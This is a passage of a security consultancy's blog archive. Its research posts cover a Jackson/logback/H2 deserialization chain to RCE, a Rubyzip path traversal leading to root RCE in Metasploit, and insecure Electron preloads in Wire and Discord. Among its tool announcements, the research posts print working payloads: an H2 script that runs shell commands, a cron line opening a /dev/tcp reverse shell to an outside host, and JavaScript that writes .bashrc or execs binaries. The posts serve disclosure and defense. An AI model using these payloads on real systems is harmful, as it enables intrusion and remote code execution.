During our research we developed a tool to assist the discovery of such vulnerabilities. When Jackson deserializes ch.qos.logback.core.db.DriverManagerConnectionSource, this class can be abused to instantiate a JDBC connection. JDBC stands for (J)ava (D)ata(b)ase (C)onnectivity. JDBC is a Java API to connect and execute a query with the database and it is a part of JavaSE (Java Standard Edition). Moreover, JDBC uses an automatic string to class mapping, as such it is a perfect target to load and execute even more “gadgets” inside the chain.

In order to demonstrate the attack, we prepared a wrapper in which we load arbitrary polymorphic classes specified by an attacker. For the environment we used jRuby, a ruby implementation running on top of the Java Virtual Machine (JVM). With its integration on top of the JVM, we can easily load and instantiate Java classes.

We’ll use this setup to load Java classes easily in a given directory and prepare the Jackson environment to meet the first two requirements (1,2) listed above. In order to do that, we implemented the following jRuby script.

require 'java'
Dir["./classpath/*.jar"].each do |f|
	require f
end
java_import 'com.fasterxml.jackson.databind.ObjectMapper'
java_import 'com.fasterxml.jackson.databind.SerializationFeature'

content = ARGV[0]

puts "Mapping"
mapper = ObjectMapper.new
mapper.enableDefaultTyping()
mapper.configure(SerializationFeature::FAIL_ON_EMPTY_BEANS, false);
puts "Serializing"
obj = mapper.readValue(content, java.lang.Object.java_class) # invokes all the setters
puts "objectified"
puts "stringified: " + mapper.writeValueAsString(obj)

The script proceeds as follows:

At line 2, it loads all of the classes contained in the Java Archives (JAR) within the “classpath” subdirectory
Between lines 5 and 13, it configures Jackson in order to meet requirements (#2)
Between lines 14 and 17, it deserializes and serializes a polymorphic Jackson object passed to jRuby as JSON

Memento: reaching the gadget

For this research we decided to use gadgets that are widely used by the Java community. All the libraries targeted in order to demonstrate this attack are in the top 100 most common libraries in the Maven central repository.

To follow along and to prepare for the attack, you can download the following libraries and put them in the “classpath” directory:

It should be noted the h2 library is not required to perform SSRF, since our experience suggests that most of the time Java applications load at least one JDBC Driver. JDBC Drivers are classes that, when a JDBC url is passed in, are automatically instantiated and the full URL is passed to them as an argument.

Using the following command, we will call the previous script with the aforementioned classpath.

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:\"}]"

On line 15 of the script, Jackson will recursively call all of the setters with the key contained inside the subobject. To be more specific, the setUrl(String url) is called with arguments by the Jackson reflection library. After that phase (line 17) the full object is serialized into a JSON object again. At this point all the fields are serialized directly, if no getter is defined, or through an explicit getter. The interesting getter for us is getConnection(). In fact, as an attacker, we are interested in all “non pure” methods that have interesting side effects where we control an argument.

When the getConnection is called, an in memory database is instantiated. Since the application is short lived, we won’t see any meaningful effect from the attacker’s perspective. In order to do something more meaningful we create a connection to a remote database. If the target application is deployed as a remote service, an attacker can generate a Server Side Request Forgery (SSRF). The following screenshot is an example of this scenario.

Enter the Matrix: From SSRF to RCE

As you may have noticed both of these scenarios lead to DoS and SSRF. While those attacks may affect the application security, we want to show you a simple and effective technique to turn a SSRF into a full chain RCE.

In order to gain full code execution in the context of the application, we employed the capability of loading the H2 JDBC Driver. H2 is a super fast SQL database usually employed as in memory replacement for full-fledged SQL Database Management Systems (such as Postgresql, MSSql, MySql or OracleDB). It is easily configurable and it actually supports many modes such as in memory, on file, and on remote servers. H2 has the capability to run SQL scripts from the JDBC URL, which was added in order to have an in-memory database that supports init migrations. This alone won’t allow an attacker to actually execute Java code inside the JVM context. However H2, since it was implemented inside the JVM, has the capability to specify custom aliases containing java code. This is what we can abuse to execute arbitrary code.

We can easily serve the following inject.sql INIT file through a simple http server such as a python one (e.g. python -m SimpleHttpServer).

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {
	String[] command = {"bash", "-c", cmd};
	java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");
	return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('id > exploited.txt')

And run the tester application with:

$ jruby test.rb "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]"
...
$ cat exploited.txt
uid=501(...) gid=20(staff) groups=20(staff),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),501(access_bpf),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),399(com.apple.access_ssh)

Voila’!

Iterative Taint-Tracking

Exploitation of deserialization vulnerabilities is complex and takes time. When conducting a product security review, time constraints can make it difficult to find the appropriate gadgets to use in exploitation. On the other end, the Jackson blacklists are updated on a monthly basis while users of this mechanism (e.g. enterprise applications) may have yearly release cycles.

Deserialization vulnerabilities are the typical needle-in-the-haystack problem. On the one hand, identifying a vulnerable entry point is an easy task, while finding a useful gadget may be time consuming (and tedious). At Doyensec we developed a technique to find useful Jackson gadgets to facilitate the latter effort. We built a static analysis tool that can find serialization gadgets through taint-tracking analysis. We designed it to be fast enough to run multiple times and iterate/improve through a custom and extensible rule-set language. On average a run on a Macbook PRO i7 2018 takes 2 minutes.

Taint-tracking is a topical academic research subject. Academic research tools are focused on a very high recall and precision. The trade-off lies between high-recall/precision versus speed/memory. Since we wanted this tool to be usable while testing commercial grade products and we valued the customizability of the tool by itself, we focused on speed and usability instead of high recall. While the tool is inspired by other research such as flowdroid, the focus of our technique is not to rule out the human analyst. Instead, we believe in augmenting manual testing and exploitation with customizable security automation.

This research was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

That’s all folks! Keep it up and be safe!

Electron Security Workshop

2019-07-03T00:00:00+02:00

2-Days Training on How to Build Secure Electron Applications

We are excited to present our brand-new class on Electron Security! This blog post provides a general overview of the 2-days workshop.

With the increasing popularity of the ElectronJs Framework, we decided to create a class that teaches students how to build and maintain secure desktop applications that are resilient to attacks and common classes of vulnerabilities. Building secure Electron applications is possible, but complicated. You need to know the framework, follow its evolution, and constantly update and devise in depth defense mechanisms to mitigate its deficiencies.

Our training begins with an overview of Electron internals and the life cycle of a typical Electron-based application. After a quick intro, we will jump straight into threat modeling and attack surface. We will analyze what are the common root causes for misconfigurations and vulnerabilities. The class will be centered around two main topics: subverting the framework and breaking the custom application code. We will present security misconfigurations, security anti-patterns, nodeIntegration and sandbox bypasses, insecure preload bugs, prototype pollution attacks, affinity abuses and much more.

The class is hands-on with many live examples. The exercises and scenarios will help students understand how to identify vulnerabilities and build mitigations. Throughout the class, we will also have a few Q&A panels to answer all questions attendees might have and potentially review their code.

If you’re interested, check out this short teaser:

Audience Profile

Who should take this course?

JavaScript and Node.js Developers
Security Engineers
Security Auditors and Pentesters

We will provide details on how to find and fix security vulnerabilities, which makes this class suitable for both blue and red teams. Basic JavaScript development experience and basic understanding of web application security (e.g. XSS) is required.

General Information

Attendees will receive a bundle with all material, including:

Workshop presentation (over 200 slides)
Code, exploits and artifacts of all exercises
Certificate of completion

This 2-days training is delivered in English, either remotely or on-site (worldwide).

Doyensec will accept up to 15 attendees per tutor. If the number of attendees exceeds the maximum allowed, Doyensec will allocate additional tutors.

We’re a flexible security boutique and can further customize the agenda to your specific company’s needs.

Feel free to contact us at info@doyensec.com for scheduling your class!

Electronegativity 1.3.0 released!

2019-06-11T00:00:00+02:00

After the first public release of Electronegativity, we had a great response from the community and the tool quickly became the baseline for every Electron app’s security review for many professionals and organizations. This pushed us forward, improving Electronegativity and expanding our research in the field. Today we are proud to release version 1.3.0 with many new improvements and security checks for your Electron applications.

Your browser does not support the video tag.

We’re also excited to announce that the tool has been accepted for Black Hat USA Arsenal 2019, where it will be showcased at the Mandalay Bay in Las Vegas. We’ll be at Arsenal Station 1 on August 7, from 4:00 pm to 5:20 pm. Drop by to see live demonstrations of Electronegativity hunting real Electron applications for vulnerabilities (or just to say hi and collect Doyensec socks)!

If you’re simply interested in trying out what’s new in Electronegativity, go ahead and update or install it using NPM:

$ npm install @doyensec/electronegativity -g
# or
$ npm update @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

What’s New

Electronegativity 1.1.1 initially shipped with 27 unique checks. Now it counts over 40 checks, featuring a new advanced check system to help improve the tool’s detection capabilities in sorting out false positive and false negative findings. Here is a brief list of what’s new in this 1.3.0 release:

Now every check has an importance and accuracy attribute which helps the auditor to determine the importance of each finding. Consequently, we also introduced some new command line flags to filter the results by severity (--severity) and by confidence (--confidence), useful for tailored Electronegativity integration in your application security pipelines or build systems.
We introduced a new class of checks called GlobalChecks which can dynamically set the severity and confidence for the findings or create new ones considering the inherit security risk posed by their interaction (e.g. cross-checking the nodeIntegration and sandbox flags value or the presence of the affinity flag used acrossed different windows).
Variable scoping analysis capabilities have been added to inspect the Function and Global variable content, when available.
A new single-check scan mode is now provided by passing the -l flag along with a list of enabled checks (e.g. -l "AuxClickJsCheck,AuxClickHtmlCheck"). Another command line flag has been introduced to show relative paths for files (-r).
The newly introduced Electron’s component BrowserView is now supported, which is meant to be an alternative to the WebView tag. The tool now also detects the use of the nodeIntegrationInSubFrames experimental option for enabling NodeJS support in sub-frames (e.g. an iframe inside a webview object).
Various bug fixes and new checks! (see below)

Updated Checks

This new release also comes with new and updated checks. As always, a knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities.

Affinity Check

When specified, renderers with the same affinity will run in the same renderer process. Due to reusing the renderer process, certain webPreferences options will also be shared between the web pages even when you specified different values for them. This can lead to unexpected security configuration overrides:

In the above demo, the affinity set between the two BrowserWindow objects will cause the unwanted share of the nodeIntegration property value. Electronegativity will now issue a finding reporting the usage of this flag if present.

Read more on the dedicated AFFINITY_GLOBAL_CHECK wiki page.

AllowPopups Check

When the allowpopups attribute is present, the guest page will be allowed to open new windows. Popups are disabled by default.

Read more on the ALLOWPOPUPS_HTML_CHECK wiki page.

Missing Electron Security Patches Detection

This check detects if there are security patches available for the Electron version used by the target application. From this release we switched from manually updating a safe releases file to creating a routine which automatically fetches the latest releases from Electron’s official repository and determines if there are security patches available at each run.

Read more on the AVAILABLE_SECURITY_FIXES_GLOBAL_CHECK and ELECTRON_VERSION_JSON_CHECK wiki page.

Check for Custom Command Line Arguments

This check will compare the custom command line arguments set in the package.json scripts and configuration objects against a blacklist of dangerous arguments. The use of additional command line arguments can increase the application attack surface, disable security features or influence the overall security posture.

Read more on the CUSTOM_ARGUMENTS_JSON_CHECK wiki page.

CSP Presence Check and Review

Electronegativity now checks if a Content Security Policy (CSP) is set as an additional layer of protection against cross-site-scripting attacks and data injection attacks. If a CSP is detected, it will look for weak directives by using a new library based on the csp-evaluator.withgoogle.com online tool.

Read more on the CSP_GLOBAL_CHECK wiki page.

Dangerous JS Functions called with user-supplied data

Looks for occurrences of insertCSS, executeJavaScript, eval, Function, setTimeout, setInterval and setImmediate with user-supplied input.

Read more on the DANGEROUS_FUNCTIONS_JS_CHECK wiki page.

Detects if the on() handler for will-navigate and new-window events is used. This setting can be used to limit the exploitability of certain issues. Not enforcing navigation limits leaves the Electron application under full control to remote origins in case of accidental navigation.

Read more on the LIMIT_NAVIGATION_GLOBAL_CHECK and LIMIT_NAVIGATION_JS_CHECK wiki pages.

Detects if Electron’s security warnings have been disabled

The tool will check if Electron’s warnings and recommendations printed to the developer console have been force-disabled by the developer. Disabling this warning may hide the presence of misconfigurations or insecure patterns to the developers.

Read more on the SECURITY_WARNINGS_DISABLED_JS_CHECK and SECURITY_WARNINGS_DISABLED_JSON_CHECK wiki pages.

Detects if setPermissionRequestHandler is missing for untrusted origins

Not enforcing custom checks for permission requests (e.g. media) leaves the Electron application under full control of the remote origin. For instance, a Cross-Site Scripting vulnerability can be used to access the browser media system and silently record audio/video. Because of this, Electronegativity will also check if a setPermissionRequestHandler has been set.

Read more on the PERMISSION_REQUEST_HANDLER_GLOBAL_CHECK wiki page.

…and more to come! If you are a developer, we encourage you to use Electronegativity to understand how these Electron’s security pitfalls affect your application and how to avoid them. We really believe that Electron deserves a strong security community behind and that creating the right and robust tools to help this community is the first step towards improving the whole Electron’s ecosystem security stance.

As a final remark, we’d like to thank all past and present contributors to this tool: @ikkisoft, @p4p3r, @0xibram, @yarlob, @lorenzostella, and ultimately @Doyensec for sponsoring this release.

See you in Vegas!

@lorenzostella

On insecure zip handling, Rubyzip and Metasploit RCE (CVE-2019-5624)

2019-04-24T00:00:00+02:00

During one of our projects we had the opportunity to audit a Ruby-on-Rails (RoR) web application handling zip files using the Rubyzip gem. Zip files have always been an interesting entry-point to triggering multiple vulnerability types, including path traversals and symlink file overwrite attacks. As the library under testing had symlink processing disabled, we focused on path traversal exploitation.

This blog post discusses our results, the “bug” discovered in the library itself and the implication of such an issue in a popular piece of software - Metasploit.

Rubyzip and old vulnerabilities

The Rubyzip gem has a long history of path traversal vulnerabilities (1, 2) through malicious filenames. Particularly interesting was the code change in PR #376 where a different handling was implemented by the developers.

# Extracts entry to file dest_path (defaults to @name).
# NB: The caller is responsible for making sure dest_path is safe, 
# if it is passed.
def extract(dest_path = nil, &block)
    if dest_path.nil? && !name_safe?
        puts "WARNING: skipped #{@name} as unsafe"
        return self
    end

[...]

Entry#name_safe is defined a few lines before as:

# Is the name a relative path, free of `..` patterns that could lead to
# path traversal attacks? This does NOT handle symlinks; if the path
# contains symlinks, this check is NOT enough to guarantee safety.
def name_safe?
    cleanpath = Pathname.new(@name).cleanpath
    return false unless cleanpath.relative?
    root = ::File::SEPARATOR
    naive_expanded_path = ::File.join(root, cleanpath.to_s)
    cleanpath.expand_path(root).to_s == naive_expanded_path
end

In the code above, if the destination path is passed to the Entry#extract function then it is not actually checked. A comment in the source code of that function highlights the user’s responsibility:

# NB: The caller is responsible for making sure dest_path is safe, if it is passed.

While the Entry#name_safe is a fair check against path traversals (and absolute paths), it is only executed when the function is called without arguments.

In order to verify the library bug we generated a ZIP PoC using the old (and still good) evilarc, and extracted the malicious file using the following code:

require 'zip'

first_arg, *the_rest = ARGV

Zip::File.open(first_arg) do |zip_file|
  zip_file.each do |entry|
    puts "Extracting #{entry.name}"
    entry.extract(entry.name)
  end
end

$ ls /tmp/file.txt
ls: cannot access '/tmp/file.txt': No such file or directory
$ zipinfo absolutepath.zip 
Archive:  absolutepath.zip
Zip file size: 289 bytes, number of entries: 2
drwxr-xr-x  2.1 unx        0 bx stor 18-Jun-13 20:13 /tmp/
-rw-r--r--  2.1 unx        5 bX defN 18-Jun-13 20:13 /tmp/file.txt
2 files, 5 bytes uncompressed, 7 bytes compressed:  -40.0%
$ ruby Rubyzip-poc.rb absolutepath.zip 
Extracting /tmp/
Extracting /tmp/file.txt
$ ls /tmp/file.txt
/tmp/file.txt

Resulting in a file being created in /tmp/file.txt, which confirms the issue.

As happened with our client, most developers might have upgraded to Rubyzip 1.2.2 thinking it was safe to use without actually verifying how the library works or its specific usage in the codebase.

It would have been vulnerable anyway `¯\_(ツ)_/¯`

In the context of our web application, the user-supplied zip was decompressed through the following (pseudo) code:

def unzip(input)
    uuid = get_uuid()
    # 0. create a 'Pathname' object with the new uuid
    parent_directory = Pathname.new("#{ENV['uploads_dir']}/#{uuid}")

    Zip::File.open(input[:zip_file].to_io) do |zip_file|
        zip_file.each_with_index do |entry, index|
            # 1. check the file is not present
            next if File.file?(parent_directory + entry.name)
            # 2. extract the entry
            entry.extract(parent_directory + entry.name)
        end
    end
    Success
end

In item #0 we can see that a Pathname object is created and then used as the destination path of the decompressed entry in item #2. However, the sum operator between objects and strings does not work as many developers would expect and might result in unintended behavior.

We can easily understand its behavior in an IRB shell:

$ irb
irb(main):001:0> require 'pathname'              
=> true
irb(main):002:0> parent_directory = Pathname.new("/tmp/random_uuid/")
=> #<Pathname:/tmp/random_uuid/>
irb(main):003:0> entry_path = Pathname.new(parent_directory + File.dirname("../../path/traversal"))
=> #<Pathname:/path>
irb(main):004:0> destination_folder = Pathname.new(parent_directory + "../../path/traversal")
=> #<Pathname:/path/traversal>
irb(main):005:0> parent_directory + "../../path/traversal"
=> #<Pathname:/path/traversal>

Thanks to the interpretation of the ../ by Pathname, the argument to Rubyzip’s Entry#extract call does not contain any path traversal payloads which results in a mistakenly supposed “safe” path. Since the gem does not perform any validation, the exploitation does not even require this unexpected path concatenation.

From Arbitrary File Write to RCE (RoR Style)

Apart from the usual *nix and windows specific techniques (like writing a new cronjob or exploiting custom scripts), we were interested in understanding how we could leverage this bug to achieve RCE in the context of a RoR application.

Since our target was running in production environments, RoR classes were cached on first usage via the cache_classes directive. During the time allocated for the engagement we didn’t find a reliable way to load/inject arbitrary code at runtime via file write without requiring a RoR reboot.

However, we did verify in a local testing environment that chaining together a Denial of Service vulnerability and a full path disclosure of the web app root can be used to trigger the web server reboot and achieve RCE via the aforementioned zip handling vulnerability.

The official documentation explains that:

After it loads the framework plus any gems and plugins in your application, Rails turns to loading initializers. An initializer is any file of ruby code stored under /config/initializers in your application. You can use initializers to hold configuration settings that should be made after all of the frameworks and plugins are loaded.

Using this feature, an attacker with the right privileges can add a malicious .rb in the /config/initializers folder which will be loaded at web server (re)boot.

Attacking the attackers. Metasploit Authenticated RCE (CVE-2019-5624)

Just after the end of the engagement and with the approval of our customer, we started looking at popular software that was likely affected by the Rubyzip bug. As we were brainstorming potential targets, an icon on one of our VMs caught our attention: Metasploit Framework

Going through the source code, we were able to quickly identify several files that are using the Rubyzip library to create ZIP files. Since our vulnerability resides in the extract function, we recalled an option to import a ZIP workspace from previous MSF versions or from different instances. We identified the corresponding code path in zip.rb file (line 157) that is responsible for importing a Metasploit ZIP File:

 data.entries.each do |e|
      target = ::File.join(@import_filedata[:zip_tmp], e.name)
      data.extract(e,target)

As for the vanilla Rubyzip example, creating a ZIP file containing a path traversal payload and embedding a valid MSF workspace (an XML file containing the exported info from a scan) made it possible to obtain a reliable file-write primitive. Since the extraction is done as root, we could easily obtain remote command execution with high privileges using the following steps:

Create a file with the following content:
* * * * * root /bin/bash -c "exec /bin/bash 0</dev/tcp/172.16.13.144/4444 1>&0 2>&0 0<&196;exec 196<>/dev/tcp/172.16.13.144/4445; bash <&196 >&196 2>&196"
Generate the ZIP archive with the path traversal payload:
python evilarc.py exploit --os unix -p etc/cron.d/
Add a valid MSF workspace to the ZIP file (in order to have MSF to extract it, otherwise it will refuse to process the ZIP archive)
Setup two listeners, one on port 4444 and the other on port 4445 (the one on port 4445 will get the reverse shell)
Login in the MSF Web Interface
Create a new “Project”
Select “Import”, “From file”, chose the evil ZIP file and finally click the “Import” button
Wait for the import process to finish
Enjoy your reverse shell

Your browser does not support the video tag.

Conclusions

In case you are using Rubyzip, check the library usage and perform additional validation against the entry name and the destination path before calling Entry#extract.

Here is a small recap of the different scenarios (as of Rubyzip v1.2.2):

Usage	Input by user?	Vulnerable to path traversal?
entry.extract(path)	yes (path)	yes
entry.extract(path)	partially (path is concatenated)	maybe
entry.extract()	partially (entry name)	no
entry.extract()	no	no

If you’re using Metasploit, it is time to patch. We look forward to seeing a msf module for CVE-2019-5624.

Credits and References

Credit for the research and bugs go to @voidsec and @polict.

This work has been performed during a customer engagement and Doyensec 25% Research Time. As such, we would like to thank our customer and Metasploit maintainers for their support.

If you’re interested in the topic, take a look at the following resources:

Subverting Electron Apps via Insecure Preload

2019-04-03T00:00:00+02:00

We’re back from BlackHat Asia 2019 where we introduced a relatively unexplored class of vulnerabilities affecting Electron-based applications.

Despite popular belief, secure-by-default settings are slowly becoming the norm and the dev community is gradually learning common pitfalls. Isolation is now widely deployed across all top Electron applications and so turning XSS into RCE isn’t child’s play anymore.

BrowserWindow preload introduces a new and interesting attack vector. Even without a framework bug (e.g. nodeIntegration bypass), this neglected attack surface can be abused to bypass isolation and access Node.js primitives in a reliable manner.

You can download the slides of our talk from the official BlackHat Briefings archive: http://i.blackhat.com/asia-19/Thu-March-28/bh-asia-Carettoni-Preloading-Insecurity-In-Your-Electron.pdf

Preloading Insecurity In Your Electron

Preload is a mechanism to execute code before renderer scripts are loaded. This is generally employed by applications to export functions and objects to the page’s window object as shown in the official documentation:

let win
app.on('ready', () => {
  win = new BrowserWindow({
    webPreferences: {
      sandbox: true,
      preload: 'preload.js'
    }
  })
  win.loadURL('http://google.com')
})

preload.js can contain custom logic to augment the renderer with easy-to-use functions or application-specific objects:

const fs = require('fs')
const { ipcRenderer } = require('electron')

// read a configuration file using the `fs` module
const buf = fs.readFileSync('allowed-popup-urls.json')
const allowedUrls = JSON.parse(buf.toString('utf8'))

const defaultWindowOpen = window.open

function customWindowOpen (url, ...args) {
  if (allowedUrls.indexOf(url) === -1) {
    ipcRenderer.sendSync('blocked-popup-notification', location.origin, url)
    return null
  }
  return defaultWindowOpen(url, ...args)
}

window.open = customWindowOpen

[...]

Through performing numerous assessments on behalf of our clients, we noticed a general lack of awareness around the risks introduced by preload scripts. Even in popular applications using all recommended security best practices, we were able to turn boring XSS into RCE in a matter of hours.

This prompted us to further research the topic and categorize four types of insecure preloads:

(1) Preload scripts can reintroduce Node global symbols back to the global scope

While it is evident that reintroducing some Node global symbols (e.g. process) to the renderer is dangerous, the risk is not immediately obvious for classes like Buffer (which can be leveraged for a nodeIntegration bypass)
(2) Preload scripts can introduce functionalities that can be abused by untrusted code

Preload scripts have access to Node.js, and the functions exported by applications to the global window often include dangerous primitives
(3) Preload scripts can facilitate sandbox bypasses

Even with sandbox enabled, preload scripts still have access to Node.JS native classes and a few Electron modules. Once again, preload code can leak privileged APIs to untrusted code that could facilitate sandbox bypasses
(4) Without contextIsolation, the integrity of preload scripts is not guaranteed

When isolated words are not in use, prototype pollution attacks can override preload script code. Malicious JavaScript running in the renderer can alter preload functions in order to return different data, bypass checks, etc.

In this blog post, we will analyze a couple of vulnerabilities belonging to group (2) which we discovered in two popular applications: Wire App and Discord.

For more vulnerabilities and examples, please refer to our presentation.

WireApp Desktop Arbitrary File Write via Insecure Preload

Wire App is a self-proclaimed “most secure collaboration platform”. It’s a secure messaging app using end-to-end encryption for file sharing, voice, and video calls. The application implements isolation by using a BrowserWindow with nodeIntegration disabled, in which a webview HTML tag is used.

Despite enforcing isolation, the web-view-preload.js preload file contains the following code:

const webViewLogger = new winston.Logger();
    webViewLogger.add(winston.transports.File, {
      filename: logFilePath,
      handleExceptions: true,
    });

    webViewLogger.info(config.NAME, 'Version', config.VERSION);

    // webapp uses global winston reference to define log level
    global.winston = webViewLogger;

Code running in the isolated renderer (e.g. XSS) can override the logger’s transport setting in order to obtain a file write primitive.

This issue can be easily verified by switching to the messages view:

window.document.getElementsByTagName("webview")[0].openDevTools();

Before executing the following code:

function formatme(args) {
  var logMessage = args.message;
  return logMessage;
}

winston.transports.file = (new winston.transports.file.__proto__.constructor({
        dirname: '/home/ikki/',
        level: 'error',
        filename: '.bashrc',
        json: false,
        formatter: formatme
}))

winston.error('xcalc &');

Your browser does not support the video tag.

This issue affected all supported platforms (Windows, Mac, Linux). As the sandbox entitlement is enabled on macOS, an attacker would need to chain this issue with another bug to write outside the application folders. Please note that since it is possible to override some application files, RCE may still be possible without a macOS sandbox bypass.

A security patch was released on March 14, 2019, just few days after our disclosure.

Discord Desktop Arbitrary IPC via Insecure Preload

Discord is a popular voice and text chat used by over 250 million gamers. The application implements isolation by simply using a BrowserWindow with nodeIntegration disabled. Despite that, the preload script (app/mainScreenPreload.js) in use by the same BrowserWindow contains multiple exports including the following:

var DiscordNative = {
    isRenderer: process.type === 'renderer',
    //..
    ipc: require('./discord_native/ipc'),
};

//..

process.once('loaded', function () {
    global.DiscordNative = DiscordNative;
    //..
}

where app/discord_native/ipc.js contains the following code:

var electron = require('electron');
var ipcRenderer = electron.ipcRenderer;

function send(event) {
  for (var _len = arguments.length, args = Array(_len > 1 ? _len - 1 : 0), _key = 1; _key < _len; _key++) {
    args[_key - 1] = arguments[_key];
  }

  ipcRenderer.send.apply(ipcRenderer, [event].concat(args));
}

function on(event, callback) {
  ipcRenderer.on(event, callback);
}

module.exports = {
  send: send,
  on: on
};

Without going into details, this script is basically a wrapper for the official Electron’s asynchronous IPC mechanism in order to exchange messages from the render process (web page) to the main process.

In Electron, ipcMain and ipcRenderer modules are used to implement IPC between the main process and the renderers but they’re also leveraged for internal native framework invocations. For instance, the window.close() function is implemented using the following event listener:

// Implements window.close()
ipcMainInternal.on('ELECTRON_BROWSER_WINDOW_CLOSE', function (event) {
  const window = event.sender.getOwnerBrowserWindow()
  if (window) {
    window.close()
  }
  event.returnValue = null
})

As there’s no separation between application-level IPC messages and the ELECTRON_ internal channel, the ability to set arbitrary channel names allows untrusted code in the renderer to subvert the framework’s security mechanism.

For example, the following synchronous IPC calls can be used to execute an arbitrary binary:

(function () {
    var ipcRenderer = require('electron').ipcRenderer
    var electron = ipcRenderer.sendSync("ELECTRON_BROWSER_REQUIRE","electron");
    var shell = ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_GET", electron.id, "shell");
    return ipcRenderer.sendSync("ELECTRON_BROWSER_MEMBER_CALL", shell.id, "openExternal", [{
                            type: 'value',
                            value: "file:///Applications/Calculator.app"
    }]);
})();

In the case of the Discord’s preload, an attacker can issue asynchronous IPC messages with arbitrary channels. While it is not possible to obtain a reference of the objects from the function exposed in the untrusted window, an attacker can still brute-force the reference of the child_process using the following code:

DiscordNative.ipc.send("ELECTRON_BROWSER_REQUIRE","child_process");

for(var i=0;i<50;i++){
    DiscordNative.ipc.send("ELECTRON_BROWSER_MEMBER_CALL", i, "exec", [{
            type: 'value',
            value: "calc.exe"
    }]);
}

Your browser does not support the video tag.

This issue affected all supported platforms (Windows, Mac, Linux). A security patch was released at the beginning of 2019. Additionally, Discord also removed backwards compatibility code with old clients.

Electronegativity is finally out!

2019-01-24T00:00:00+01:00

We’re excited to announce the public release of Electronegativity, an opensource tool capable of identifying misconfigurations and security anti-patterns in Electron-based applications.

Electronegativity is the first-of-its-kind tool that can help software developers and security auditors to detect and mitigate potential weaknesses in Electron applications.

If you’re simply interested in trying out Electronegativity, go ahead and install it using NPM:

$ npm install @doyensec/electronegativity -g

To review your application, use the following command:

$ electronegativity -i /path/to/electron/app

Results are displayed in a compact table, with references to application files and our knowledge-base.

The remaining blog post will provide more details on the public release and introduce its current features.

A bit of history

Back in July 2017 at the BlackHat USA Briefings, we presented the first comprehensive study on Electron security where we primarily focused on framework-level vulnerabilities and misconfigurations. As part of our research journey, we also created a checklist of security anti-patterns and must-have features to illustrate misconfigurations and vulnerabilities in Electron-based applications.

With that, me and Claudio Merloni started developing the first prototype for Electronegativity. Immediately after the BlackHat presentation, we received a lot of great feedback and new ideas on how to evolve the tool. Back home, we started working on those improvements until we realized that we had to rethink the overall design. The code repository was made private again and minor refinements were done in between customer projects only.

In the summer of 2018, we hired Doyensec’s first intern - Ibram Marzouk who started working on the tool again. Later, Jaroslav Lobacevski joined the project team and pushed Electronegativity to the finish line. Claudio, Ibram and Jaroslav, thanks for your contributions!

While certainly overdue, we’re happy that we eventually managed to release the tool in better shape. We believe that Electron is here to stay and hopefully Electronegativity will become a useful companion for all Electron developers out there.

How Does It Work?

Electronegativity leverages AST / DOM parsing to look for security-relevant configurations. Checks are standalone files, which makes the tool modular and extensible.

Building a new check is relatively easy too. We support three “families” of checks, so that the tool can analyze all resources within an Electron application:

JS (using a combination of Esprima, Babel, TypeScript ESTree)
HTML (using Cheerio)
JSON (using the native JSON.parse())

When you scan an application, the tool will unpack all resources (if applicable) and perform an audit using all registered checks. Results are displayed in the terminal, CSV file or SARIF format.

Supported Checks

Electronegativity currently implements the following checks. A knowledge-base containing information around risk and auditing strategy has been created for each class of vulnerabilities:

Leveraging these 27 checks, Electronegativity is already capable of identifying many vulnerabilities in real-life applications. Going forward, we will keep improving the detection and updating the tool to keep pace with the fast-changing Electron framework. Start using Electronegativity today!

Introducing burp-rest-api v2

2018-11-05T00:00:00+01:00

Since the first commit back in 2016, burp-rest-api has been the default tool for BurpSuite-powered web scanning automation. Many security professionals and organizations have relied on this extension to orchestrate the work of Burp Spider and Scanner.

Today, we’re proud to announce a new major release of the tool: burp-rest-api v2.0.1

Starting in June 2018, Doyensec joined VMware in the development and support of the growing burp-rest-api community. After several years of experience in big tech companies and startups, we understand the need for security automation to improve efficacy and efficiency during software security activities. Unfortunately internal security tools are rarely open-sourced, and still, too many companies are reinventing the wheel. We believe that working together on foundational components, such as burp-rest-api, represents the future of security automation as it empowers companies of any size to build customized solutions.

After a few weeks of work, we cleaned up all the open issues and brought burp-rest-api to its next phase. In this blog post, we would like to summarize some of the improvements.

Releases

You can now download the latest version of burp-rest-api from https://github.com/vmware/burp-rest-api/releases in a precompiled release build. While this may not sound like a big deal, it’s actually the result of a major change in the plugin bootstrap mechanism. Until now, burp-rest-api was strictly dependent on the original Burp Suite JAR to be compiled, hence we weren’t able to create stable releases due to licensing. By re-engineering the way burp-rest-api starts, it is now possible to build the extension without even having burpsuite_pro.jar.

git clone git@github.com:vmware/burp-rest-api.git
cd burp-rest-api
./gradlew clean build

Once built, you can now execute Burp with the burp-rest-api extension using the following command:

java -jar burp-rest-api-2.0.0.jar --burp.jar=./lib/burpsuite_pro.jar

Burp Extensions and BAppStore

Many users have asked for the ability to load additional extensions while running Burp with burp-rest-api. Thanks to a new bootstrap mechanism, burp-rest-api is loaded as a 2nd generation extension which makes it possible to load both custom and BAppStore extensions written in any of the supported programming languages.

Moreover, the tool allows loading extensions during application startup using the flag --burp.ext=<filename.{jar,rb,py}>.

In order to implement this, we employed a classloading technique with a dummy entry point (BurpExtender.java) that loads the legacy Burp extension (LegacyBurpExtension.java) after the full Burp Suite has been loaded and launched (BurpService.java).

Bug Fixes and Improvements

In this release, we have also focused our efforts on a massive issues house-cleaning:

Better documentation and even a FAQs page
Burp Spider status API
Burp Configuration with configPath selection API
Enabled SpringBoot compression
Ability to customize the binding address:port for both Burp Proxy and burp-rest-api APIs via command line arguments
…and much more

